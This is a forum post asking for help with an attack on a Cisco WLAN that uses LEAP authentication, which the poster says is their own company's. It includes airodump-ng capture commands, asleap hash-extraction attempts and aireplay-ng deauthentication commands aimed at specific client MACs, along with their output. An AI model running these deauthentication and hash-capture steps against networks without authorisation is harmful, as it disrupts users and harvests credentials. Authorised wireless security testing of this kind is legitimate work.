Hey wireless specialists

It's my first post, I would be very helpful if someone could help me with my questions.

I'm learning about attacking at WEP LEAP authentication network.

Basically my network is a Cisco AP configured with WEP LEAP authenticating at a LDAP (integrated with my Domain Controller).

I have 3 different APs with the same configuration, to cover all our company space, all have the same BSSID - and it's not broadcasted.

I was able to see my network with kismet or airodump-ng, and I can extract a few hashes (with asleap) from the .pcap file generated by airodump-ng. But my problem and question is, why I can't see and extract all the hashes authenticating? And why I can't force existent clients to de-authenticate and authenticate again to collect the hashes.

Well, my airodump-ng has output like:

airodump-ng -w ch06 --channel 06 --bssid 00:26:43:22:85:A2 wlan0

CH 6 ][ Elapsed: 1 min ][ 2009-12-15 13:33

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:26:43:22:85:A2 -27 7 273 208 0 6 54e. WEP WEP FWCHP

BSSID STATION PWR Rate Lost Packets Probes

00:26:43:22:85:A2 00:23:CB:82:AA:90 -17 2e-54 5 235
00:26:43:22:85:A2 00:1E:65:A2:49:7C -21 54e-54e 4 16
00:26:43:22:85:A2 00:13:E8:1C:A3:90 -32 54e-18e 0 13
00:26:43:22:85:A2 00:1B:77:2C:8F:FA -40 36e-48e 0 12
00:26:43:22:85:A2 00:13:02:C4:76:14 -42 36e-36e 0 23
00:26:43:22:85:A2 00:1C:BF:22:AC:92 -35 5e- 1e 28 192
As you can see, I was targeting a specific AP (from my 3) that is working at channel 6 and with BSSID 00:26:43:22:85:A2. The name of my SSID is FWCHP. Is not strange no clients from my 6 active connections never probe it?

Most of the time, I never get hashes captured, if I look at the pcap files I just get:

MySystem:~# asleap -s -r ch06-01.cap
asleap 2.2 - actively recover LEAP/PPTP passwords.
Closing pcap ...
Before read the .cap file with asleap I disconnected from the AP and authenticated again and no hash was collected.

To make sure that I was doing all right, I powered down the machine and started again and authenticated again and the same happened, no hashes collected at my attacking machine as demonstrated above. Any guess why?

If I keep it running for more time, sometimes I get:

MySystem:~# asleap -s -r ch06-01.cap
asleap 2.2 - actively recover LEAP/PPTP passwords.
LEAP Response, but does not match ID for previously observed request frame (136/154).
LEAP Response, but does not match ID for previously observed request frame (136/154).
Closing pcap ...
It's strange, since I was connected in the specific channel, specific BSSID and waiting for more than 4 hours. Also, I reconnected and connected several times and no hashes. I don't understand why I'm not capturing it and it's telling that the tool is unable to match the ID. Any guess why it's happening?

My first try, was force clients (stations) to disconnect / de-authenticate and consequently when they connect again I should get the hashes, right?

I did like:

MySystem:~# aireplay-ng -a 00:26:43:22:85:A2 -c 00:23:CB:82:AA:90 -e FWCHP --deauth 15 wlan0
13:42:49 Waiting for beacon frame (BSSID: 00:26:43:22:85:A2) on channel 6
13:42:51 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 1| 0 ACKs]
13:42:52 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 1| 0 ACKs]
13:42:53 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:42:54 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:42:55 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:42:56 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:42:57 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:42:58 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 1| 0 ACKs]
13:42:59 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:43:00 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:43:01 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:43:03 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 1| 0 ACKs]
13:43:04 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:43:05 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 3| 0 ACKs]
13:43:06 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
But it never generate any hash. And the worst, the client (station) 00:23:CB:82:AA:90 never got disconnected. The machine was on my side and I was looking for it all the time and it never lose connectivity.

Strange, not? Any guess why?

I did this test, since I believe it may help:

MySystem:~# aireplay-ng -a 00:26:43:22:85:A2 -c 00:23:CB:82:AA:90 -e FWCHP --test wlan0
13:48:07 Waiting for beacon frame (BSSID: 00:26:43:22:85:A2) on channel 6
13:48:07 Trying broadcast probe requests...
13:48:09 No Answer...
13:48:09 Found 1 AP

13:48:09 Trying directed probe requests...
13:48:09 00:26:43:22:85:A2 - channel: 6 - 'FWCHP'
13:48:16 0/30: 0%
I will be very help if someone could give me hints to improve my attack and explain me where I'm failing or doing things wrong.

I'm using BackTrack.

Thanks.

Regards,